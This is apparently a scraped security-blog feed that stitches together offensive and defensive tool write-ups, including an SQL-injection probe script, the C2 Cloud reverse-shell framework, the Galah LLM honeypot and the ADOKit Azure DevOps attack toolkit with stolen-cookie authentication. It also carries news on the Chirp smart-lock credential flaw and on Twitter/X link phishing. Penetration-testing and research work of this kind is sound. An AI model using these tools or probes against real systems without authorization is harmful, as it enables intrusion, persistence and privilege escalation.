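# and look for database error strings in the response.
import requests
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

SQL_ERRORS = ["you have an error in your sql syntax", "unclosed quotation mark",
              "sqlstate", "pg_query()", "sqlite3.operationalerror"]

def probe(url: str) -> bool:
    parts = urlsplit(url)
    params = parse_qsl(parts.query)
    for i, (key, value) in enumerate(params):
        tampered = params.copy()
        tampered[i] = (key, value + "'")                 # inject a single quote
        test_url = urlunsplit(parts._replace(query=urlencode(tampered)))
        body = requests.get(test_url, timeout=10).text.lower()
        if any(err in body for err in SQL_ERRORS):
            print(f"[!] Possible SQL injection via parameter '{key}': {test_url}")
            return True
    return False

probe("http://example.com/item.php?id=1")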

    ToDo

    • Check for multiple GET params
    • Better injection checker trigger methods

    Credits

    License

    This project is licensed under the GNU Affero General Public License v3.0.



    C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

    By: Zion3R


    The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

    C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

    Reverse shells support:

    1. Reverse TCP
    2. Reverse HTTP
    3. Reverse HTTPS (configure it behind an LB)
    4. Telegram C2

    Demo

    C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
    Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
    Telegram C2: https://youtu.be/WLQtF4hbCKk

    Key Features

    🔒 Anywhere Access: Reach the C2 Cloud from any location.
    🔄 Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
    🖱️ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
    📜 Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

    Tech Stack

    🛠️ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
    🔗 TCP Socket: Serving reverse TCP requests for enhanced functionality.
    🌐 Nginx: Effortlessly routing traffic between web and backend systems.
    📨 Redis PubSub: Serving as a robust message broker for seamless communication.
    🚀 Websockets: Delivering real-time updates to browser clients for enhanced user experience.
    💾 Postgres DB: Ensuring persistent storage for seamless continuity.
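As a sketch of the message-broker role described above, here is a generic redis-py pub/sub exchange; the channel name and payload are made up for illustration and are not C2 Cloud's actual ones.

# Generic Redis pub/sub sketch: one side publishes session output, the other
# subscribes and forwards it (e.g., to a websocket client).
import redis   # pip install redis

r = redis.Redis(host="localhost", port=6379)
p = r.pubsub()
p.subscribe("session:42:output")                             # web side listens on a session channel

r.publish("session:42:output", "uid=0(root) gid=0(root)")    # backend publishes command output

p.get_message(timeout=1)                                     # first message is the subscribe confirmation
msg = p.get_message(timeout=1)                               # then the published payload
if msg and msg["type"] == "message":
    print(msg["data"].decode())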

    Architecture

    Application setup

    • Management port: 9000
• Reverse HTTP port: 8000
    • Reverse TCP port: 8888

    • Clone the repo

• Optional: Update chat_id, bot_token in c2-telegram/config.yml
• Execute docker-compose up -d to start the containers. Note: the c2-api service will not start until the database is initialized. If you receive 500 errors, please try again after some time.

    Credits

    Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

    License

    Distributed under the MIT License. See LICENSE for more information.

    Contact



    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R


    TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
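Here is a minimal Python sketch of that caching idea, keyed by port and a hash of the request so that the same probe on another port still triggers a fresh LLM call. The class and TTL value are illustrative, not Galah's Go implementation.

# Per-port response cache with TTL, as described above.
import hashlib
import time

class ResponseCache:
    def __init__(self, ttl_seconds: int = 3600):
        self.ttl = ttl_seconds
        self._store = {}   # (port, request_hash) -> (expires_at, response)

    @staticmethod
    def _key(port: int, raw_request: bytes):
        return port, hashlib.sha256(raw_request).hexdigest()

    def get(self, port: int, raw_request: bytes):
        entry = self._store.get(self._key(port, raw_request))
        if entry and entry[0] > time.time():
            return entry[1]
        return None   # miss or expired: the caller asks the LLM and then calls put()

    def put(self, port: int, raw_request: bytes, response: str) -> None:
        self._store[self._key(port, raw_request)] = (time.time() + self.ttl, response)

cache = ResponseCache(ttl_seconds=600)
if cache.get(8080, b"GET /.git/config HTTP/1.1") is None:
    cache.put(8080, b"GET /.git/config HTTP/1.1", '{"Headers": {...}, "Body": "..."}')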

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    ██████ █████ ██ █████ ██ ██
    ██ ██ ██ ██ ██ ██ ██ ██
    ██ ███ ███████ ██ ███████ ███████
    ██ ██ ██ ██ ██ ██ ██ ██ ██
    ██████ ██ ██ ███████ ██ ██ ██ ██
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
    No, I am a server.

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    😑

    % curl http://localhost:8888/i-mean-are-you-a-fake-server
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!



    Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

    By: Zion3R



    Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0, created by BLACK-SCORP10 (t.me/BLACK-SCORP10).

    Features

    • Check the status of single or multiple URLs/domains.
    • Asynchronous HTTP requests for improved performance (see the sketch after this list).
    • Color-coded output for better visualization of status codes.
    • Progress bar when checking multiple URLs.
    • Save results to an output file.
    • Error handling for inaccessible URLs and invalid responses.
    • Command-line interface for easy usage.
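    As a rough illustration of the asynchronous checking and status-code categorization described above, here is a minimal sketch assuming the aiohttp library (the actual status_checker.py may be implemented differently):

        import asyncio
        import aiohttp

        # Sketch only: async status checks bucketed by status-code class.
        async def check(session: aiohttp.ClientSession, url: str) -> tuple[str, str]:
            try:
                async with session.get(url, timeout=aiohttp.ClientTimeout(total=10)) as resp:
                    return url, str(resp.status)
            except Exception as exc:
                return url, f"error ({type(exc).__name__})"

        async def main(urls: list[str]) -> None:
            async with aiohttp.ClientSession() as session:
                results = await asyncio.gather(*(check(session, u) for u in urls))
            for url, status in results:
                # Categorize by the first digit of the status code (2xx, 3xx, 4xx, 5xx).
                bucket = f"{status[0]}xx" if status[:1].isdigit() else "ERR"
                print(f"[{bucket}] {status} {url}")

        if __name__ == "__main__":
            asyncio.run(main(["https://example.com", "https://example.org/missing"]))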

    Installation

    1. Clone the repository:

    git clone https://github.com/your_username/status-checker.git
    cd status-checker

    2. Install dependencies:

    pip install -r requirements.txt

    Usage

    python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
    • -d, --domain: Single domain/URL to check.
    • -l, --list: File containing a list of domains/URLs to check.
    • -o, --output: File to save the output.
    • -v, --version: Display version information.
    • -update: Update the tool.

    Example:

    python status_checker.py -l urls.txt -o results.txt


    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    How to Conduct Advanced Static Analysis in a Malware Sandbox

    Sandboxes are synonymous with dynamic malware analysis. They help to execute malicious files in a safe virtual environment and observe their behavior. However, they also offer plenty of value in terms of static analysis. See these five scenarios where a sandbox can prove to be a useful tool in your investigations. Detecting Threats in PDFs PDF files are frequently exploited by threat actors to

    Crickets from Chirp Systems in Smart Lock Key Leak

    The U.S. government is warning that “smart locks” securing entry to an estimated 50,000 dwellings nationwide contain hard-coded credentials that can be used to remotely open any of the locks. The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021. Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

    On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

    “Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access,” CISA’s alert warned, assigning the bug a CVSS (badness) rating of 9.1 (out of a possible 10). “Chirp Systems has not responded to requests to work with CISA to mitigate this vulnerability.”

    Matt Brown, the researcher CISA credits with reporting the flaw, is a senior systems development engineer at Amazon Web Services. Brown said he discovered the weakness and reported it to Chirp in March 2021, after the company that manages his apartment building started using Chirp smart locks and told everyone to install Chirp’s app to get in and out of their apartments.

    “I use Android, which has a pretty simple workflow for downloading and decompiling the APK apps,” Brown told KrebsOnSecurity. “Given that I am pretty picky about what I trust on my devices, I downloaded Chirp and after decompiling, found that they were storing passwords and private key strings in a file.”

    Using those hard-coded credentials, Brown found an attacker could then connect to an application programming interface (API) that Chirp uses which is managed by smart lock vendor August.com, and use that to enumerate and remotely lock or unlock any door in any building that uses the technology.

    Update, April 18, 11:55 a.m. ET: August has provided a statement saying it does not believe August or Yale locks are vulnerable to the hack described by Brown.

    “We were recently made aware of a vulnerability disclosure regarding access control systems provided by Chirp, using August and Yale locks in multifamily housing,” the company said. “Upon learning of these reports, we immediately and thoroughly investigated these claims. Our investigation found no evidence that would substantiate the vulnerability claims in either our product or Chirp’s as it relates to our systems.”

    Update, April 25, 2:45 p.m. ET: Based on feedback from Chirp, CISA has downgraded the severity of this flaw and revised their security advisory to say that the hard-coded credentials do not appear to expose the devices to remote locking or unlocking. CISA says the hardcoded credentials could be used by an attacker within the range of Bluetooth (~30 meters) “to change the configuration settings within the Bluetooth beacon, effectively removing Bluetooth visibility from the device. This does not affect the device’s ability to lock or unlock access points, and access points can still be operated remotely by unauthorized users via other means.”

    Brown said when he complained to his leasing office, they sold him a small $50 key fob that uses Near-Field Communications (NFC) to toggle the lock when he brings the fob close to his front door. But he said the fob doesn’t eliminate the ability for anyone to remotely unlock his front door using the exposed credentials and the Chirp mobile app.

    Also, the fobs pass the credentials to his front door over the air in plain text, meaning someone could clone the fob just by bumping against him with a smartphone app made to read and write NFC tags.

    Neither August nor Chirp Systems responded to requests for comment. It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state that approximately 50,000 units use Chirp smart locks with August’s API.

    Roughly a year before Brown reported the flaw to Chirp Systems, the company was bought by RealPage, a firm founded in 1998 as a developer of multifamily property management and data analytics software. In 2021, RealPage was acquired by the private equity giant Thoma Bravo.

    Brown said the exposure he found in Chirp’s products is “an obvious flaw that is super easy to fix.”

    “It’s just a matter of them being motivated to do it,” he said. “But they’re part of a private equity company now, so they’re not answerable to anybody. It’s too bad, because it’s not like residents of [the affected] properties have another choice. It’s either agree to use the app or move.”

    In October 2022, an investigation by ProPublica examined RealPage’s dominance in the rent-setting software market, and found that the company “uses a mysterious algorithm to help landlords push the highest possible rents on tenants.”

    “For tenants, the system upends the practice of negotiating with apartment building staff,” ProPublica found. “RealPage discourages bargaining with renters and has even recommended that landlords in some cases accept a lower occupancy rate in order to raise rents and make more money. One of the algorithm’s developers told ProPublica that leasing agents had ‘too much empathy’ compared to computer generated pricing.”

    Last year, the U.S. Department of Justice threw its weight behind a massive lawsuit filed by dozens of tenants who are accusing the $9 billion apartment software company of helping landlords collude to inflate rents.

    In February 2024, attorneys general for Arizona and the District of Columbia sued RealPage, alleging RealPage’s software helped create a rental monopoly.

    Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

    By: Zion3R


    This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

    It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


    Advantages

    To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

    1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

    2. The pack is integrated with a Universal Updater made by us from scratch. Thanks to that, we get to maintain all the tools in an automated fashion.

    3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use into the updater, and then add the links for your tools to bin\sendto\sendto so they appear in the context menus.

    4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

    Installation

    1. You can simply download the stable versions from the release section, where you can also find the installer.

    2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
      You will find the binary in the folder bin\updater\updater.exe.

    Tool set

    This toolkit is composed of 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
    Every tool has been downloaded from its original/official website, but we still recommend you use them with caution, especially those tools whose official pages are forum threads. Always exercise common sense.
    You can check the complete list of tools here.

    About contributions

    Pull Requests are welcome. If you want to propose big changes, please create an Issue first so we can all analyze and discuss them. The tools are compressed with 7-Zip, and the naming format is {name} - {version}.7z



    Apple Updates Spyware Alert System to Warn Victims of Mercenary Attacks

    Apple on Wednesday revised its documentation pertaining to its mercenary spyware threat notification system to mention that it alerts users when they may have been individually targeted by such attacks. It also specifically called out companies like NSO Group for developing commercial surveillance tools such as Pegasus that are used by state actors to pull off "individually targeted

    Twitter’s Clumsy Pivot to X.com Is a Gift to Phishers

    On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead. But over the past 48 hours, dozens of new domain names have been registered that demonstrate how this change could be used to craft convincing phishing links — such as fedetwitter[.]com, which until very recently rendered as fedex.com in tweets.

    The message displayed when one visits goodrtwitter.com, which Twitter/X displayed as goodrx.com in tweets and messages.

    A search at DomainTools.com shows at least 60 domain names have been registered over the past two days for domains ending in “twitter.com,” although research so far shows the majority of these domains have been registered “defensively” by private individuals to prevent the domains from being purchased by scammers.

    Those include carfatwitter.com, which Twitter/X truncated to carfax.com when the domain appeared in user messages or tweets. Visiting this domain currently displays a message that begins, “Are you serious, X Corp?”

    Update: It appears Twitter/X has corrected its mistake, and no longer truncates any domain ending in “twitter.com” to “x.com.”

    Original story:

    The same message is on other newly registered domains, including goodrtwitter.com (goodrx.com), neobutwitter.com (neobux.com), roblotwitter.com (roblox.com), square-enitwitter.com (square-enix.com) and yandetwitter.com (yandex.com). The message left on these domains indicates they were defensively registered by a user on Mastodon whose bio says they are a systems admin/engineer. That profile has not responded to requests for comment.

    A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan. The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

    The domain mentioned at the beginning of this story — fedetwitter.com — redirects users to the blog of a Japanese technology enthusiast. A user with the handle “amplest0e” appears to have registered space-twitter.com, which Twitter/X users would see as the CEO’s “space-x.com.” The domain “ametwitter.com” already redirects to the real americanexpress.com.

    Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registration records. Those include firefotwitter[.]com (firefox.com), ngintwitter[.]com (nginx.com), and webetwitter[.]com (webex.com).

    The domain setwitter.com, which Twitter/X until very recently rendered as “sex.com,” redirects to this blog post warning about the recent changes and their potential use for phishing.

    Sean McNee, vice president of research and data at DomainTools, told KrebsOnSecurity it appears Twitter/X did not properly limit its redirection efforts.

    “Bad actors could register domains as a way to divert traffic from legitimate sites or brands given the opportunity — many such brands in the top million domains end in x, such as webex, hbomax, xerox, xbox, and more,” McNee said. “It is also notable that several other globally popular brands, such as Rolex and Linux, were also on the list of registered domains.”

    The apparent oversight by Twitter/X was cause for amusement and amazement from many former users who have migrated to other social media platforms since the new CEO took over. Matthew Garrett, a lecturer at U.C. Berkeley’s School of Information, summed up the Schadenfreude thusly:

    “Twitter just doing a ‘redirect links in tweets that go to x.com to twitter.com instead but accidentally do so for all domains that end x.com like eg spacex.com going to spacetwitter.com’ is not absolutely the funniest thing I could imagine but it’s high up there.”

    ADOKit - Azure DevOps Services Attack Toolkit

    By: Zion3R


    Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

    Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


    Installation/Building

    Libraries Used

    The below 3rd party libraries are used in this project.

    Library | URL | License
    Fody | https://github.com/Fody/Fody | MIT License
    Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License

    Pre-Compiled

    • Use the pre-compiled binary in Releases

    Building Yourself

    Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

    • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
    • Go to "NuGet Package Manager" --> "Package Sources"
    • Add a package source with the URL https://api.nuget.org/v3/index.json
    • Install the Costura.Fody NuGet package.
    • Install-Package Costura.Fody -Version 3.3.3
    • Install the Newtonsoft.Json package
    • Install-Package Newtonsoft.Json
    • You can now build the project yourself!

    Command Modules

    • Recon
    • check - Check whether organization uses Azure DevOps and if credentials are valid
    • whoami - List the current user and its group memberships
    • listrepo - List all repositories
    • searchrepo - Search for given repository
    • listproject - List all projects
    • searchproject - Search for given project
    • searchcode - Search for code containing a search term
    • searchfile - Search for file based on a search term
    • listuser - List users
    • searchuser - Search for a given user
    • listgroup - List groups
    • searchgroup - Search for a given group
    • getgroupmembers - List all group members for a given group
    • getpermissions - Get the permissions for who has access to a given project
    • Persistence
    • createpat - Create personal access token for user
    • listpat - List personal access tokens for user
    • removepat - Remove personal access token for user
    • createsshkey - Create public SSH key for user
    • listsshkey - List public SSH keys for user
    • removesshkey - Remove public SSH key for user
    • Privilege Escalation
    • addprojectadmin - Add a user to the "Project Administrators" for a given project
    • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
    • addbuildadmin - Add a user to the "Build Administrators" group for a given project
    • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
    • addcollectionadmin - Add a user to the "Project Collection Administrators" group
    • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
    • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
    • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
    • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
    • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
    • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
    • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
    • getpipelinevars - Retrieve any pipeline variables used for a given project.
    • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
    • getserviceconnections - Retrieve the service connections used for a given project.

    Arguments/Options

    • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
    • /url: - Azure DevOps URL. Applicable to all modules.
    • /search: - Keyword to search for. Not applicable to all modules.
    • /project: - Project to perform an action for. Not applicable to all modules.
    • /user: - Perform an action against a specific user. Not applicable to all modules.
    • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
    • /group: - Perform an action against a specific group. Not applicable to all modules.

    Authentication Options

    Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

    • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
    • /credential:UserAuthentication=ABC123
    • Personal Access Token (PAT) - This will be an access token/API key that will be a single string (see the illustrative sketch after this list).
    • /credential:apiToken
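    For context on the PAT option: Azure DevOps REST endpoints accept a PAT as the password of an HTTP Basic authorization header with an empty username, which is why a single API-key string is sufficient. The Python sketch below only illustrates that underlying REST pattern against the public projects endpoint (not ADOKit's own code); the organization URL, PAT value, and api-version=7.0 are placeholders/assumptions:

        import base64
        import json
        import urllib.request

        # Illustration of presenting a PAT to the Azure DevOps REST API via
        # HTTP Basic auth (empty username, PAT as password). Not ADOKit code.
        ORG_URL = "https://dev.azure.com/organizationName"   # placeholder
        PAT = "apiKey"                                        # placeholder PAT

        token = base64.b64encode(f":{PAT}".encode()).decode()
        req = urllib.request.Request(
            f"{ORG_URL}/_apis/projects?api-version=7.0",
            headers={"Authorization": f"Basic {token}"},
        )
        with urllib.request.urlopen(req) as resp:
            projects = json.load(resp)

        for project in projects.get("value", []):
            print(project["name"], project.get("visibility"))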

    Module Details Table

    The below table shows the permissions required for each module.

    Attack Scenario | Module | Special Permissions? | Notes
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    Recon | check | No |
    Recon | whoami | No |
    Recon | listrepo | No |
    Recon | searchrepo | No |
    Recon | listproject | No |
    Recon | searchproject | No |
    Recon | searchcode | No |
    Recon | searchfile | No |
    Recon | listuser | No |
    Recon | searchuser | No |
    Recon | listgroup | No |
    Recon | searchgroup | No |
    Recon | getgroupmembers | No |
    Recon | getpermissions | No |
    Persistence | createpat | No |
    Persistence | listpat | No |
    Persistence | removepat | No |
    Persistence | createsshkey | No |
    Persistence | listsshkey | No |
    Persistence | removesshkey | No |
    Privilege Escalation | addprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | removeprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | addbuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | removebuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts |
    Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts |
    Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts |
    Privilege Escalation | getpipelinevars | Yes - Contributors, Readers, Build Administrators, Project Administrators, Project Team Member, Project Collection Test Service Accounts, Project Collection Build Service Accounts, Project Collection Build Administrators, Project Collection Service Accounts or Project Collection Administrators |
    Privilege Escalation | getpipelinesecrets | Yes - Contributors, Readers, Build Administrators, Project Administrators, Project Team Member, Project Collection Test Service Accounts, Project Collection Build Service Accounts, Project Collection Build Administrators, Project Collection Service Accounts or Project Collection Administrators |
    Privilege Escalation | getserviceconnections | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts |

    Examples

    Validate Azure DevOps Access

    Use Case

    Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

    Syntax

    Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

    ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

